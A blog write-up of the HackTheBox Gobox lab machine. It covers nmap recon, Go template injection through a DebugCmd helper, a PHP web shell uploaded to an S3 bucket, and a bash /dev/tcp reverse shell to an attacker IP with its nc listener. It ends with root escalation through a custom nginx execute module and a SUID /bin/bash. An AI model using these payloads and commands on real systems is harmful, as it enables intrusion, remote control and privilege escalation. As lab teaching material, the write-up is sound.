Post

HackTheBox Gobox Writeup

Posted
By x3ric
4 min read

Explore the fundamentals of cybersecurity in the Gobox Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1

10.10.11.113 gobox.htb

Script to add hosts automatically

1
2
3

ip="10.10.11.113"
domain="gobox.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1

nmap -sCV gobox.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-30 02:46 CEST
Nmap scan report for gobox.htb (10.10.11.113)
Host is up (0.050s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open     http       nginx
|_http-title: Hacking eSports | {{.Title}}
8080/tcp open     http       nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1. Identify the Vulnerability

  • The target site at http://gobox.htb:8080/ is running a Go-based application, as indicated by the X-Forwarded-Server: golang header in BurpSuite responses.
  • Based on the response, you’ve found that the application could be vulnerable to Server-Side Template Injection (SSTI) using Go templates.

2. Initial SSTI Test

  • On the /forgot page, insert the payload {{ . }} in the email field to test for template injection.
  • If vulnerable, this will reveal Go template context variables or throw an error exposing internal details of the server.

3. Exploiting DebugCmd

  • After successfully logging in with credentials sent via email from the /forgot page, the source code of the application is revealed.
  • You discover the DebugCmd function in the template engine, which allows the execution of system commands.

Test system commands using the following payloads:

1
2
3
4

{{ .DebugCmd "id" }}  // Check for user privileges
{{ .DebugCmd "env" }}  // View environment variables
{{ .DebugCmd "aws s3 ls s3://" }}  // List S3 buckets
{{ .DebugCmd "aws s3 ls s3://website" }}  // List contents of a specific bucket

4. Preparing the Payload

  • The goal is to upload a PHP reverse shell to the S3 bucket via the AWS CLI exposed through DebugCmd.
  • First, generate a base64-encoded PHP reverse shell:
1

echo '<?php system($_GET['cmd']); ?>' | base64

This will output the encoded payload:

1

PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
  • Use DebugCmd to decode and save this as a PHP file on the target system, and then upload it to the S3 bucket.
1
2

{{ .DebugCmd "echo -n PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo= | base64 -d > /tmp/evil.php" }}
{{ .DebugCmd "aws s3 cp /tmp/evil.php s3://website/evil.php" }}

5. Accessing the Payload

  • Once the reverse shell script is uploaded, it can be accessed via:
1

http://gobox.htb/evil.php

You can then execute commands by passing the cmd parameter.

6. Triggering the Reverse Shell

To establish a reverse shell, use the following bash command:

1

bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'

Since this needs to be URL-encoded, use sed to encode only the & and / characters:

1

echo -n "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'" | sed -e 's:/:%2f:g' -e 's:&:%26:g'

7. Setting Up a Listener

On your local machine, set up a listener to catch the reverse shell:

1

nc -lvnp 9001

8. Triggering the Shell

To trigger the reverse shell, visit:

1

http://gobox.htb/evil.php?cmd=bash -c '%2fbin%2fbash -i >%26 %2fdev%2ftcp%2f10.10.14.2%2f9001 0>%261'

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

1

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

1

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

1

export TERM=xterm;

Nginx Module Exploitation (ngx_http_execute_module)

Initial Enumeration

Retrieve the user flag from /home/ubuntu/user.txt:

1

cat /home/ubuntu/user.txt

Investigate Nginx configuration:

1
2

ls /etc/nginx/sites-enabled
cat /etc/nginx/sites-enabled/default

You find the custom directive command on;, which is not part of the default Nginx setup, indicating a custom module.

Identifying the Custom Module

A Google search for command on; nginx github reveals the NginxExecute module, which allows command execution via Nginx.

Verifying the Nginx Module

  • To confirm the presence of this module and its functionality, you inspect the Nginx module binary for references to the run function:
1

strings /usr/share/nginx/modules/ngx_http_execute_module.so | grep run

Command Execution

Use the ippsec.run parameter in HTTP requests to execute system commands. Test with a basic command:

1
2

curl -g "http://127.0.0.1:8000/?ippsec.run[id]"
curl -g "http://127.0.0.1:8000/?ippsec.run[cat /root/root.txt]"

1
2

curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 4755 /bin/bash]"
/bin/bash -p
ctf
htb cft writeup linux aws
This post is licensed under CC BY 4.0 by the author.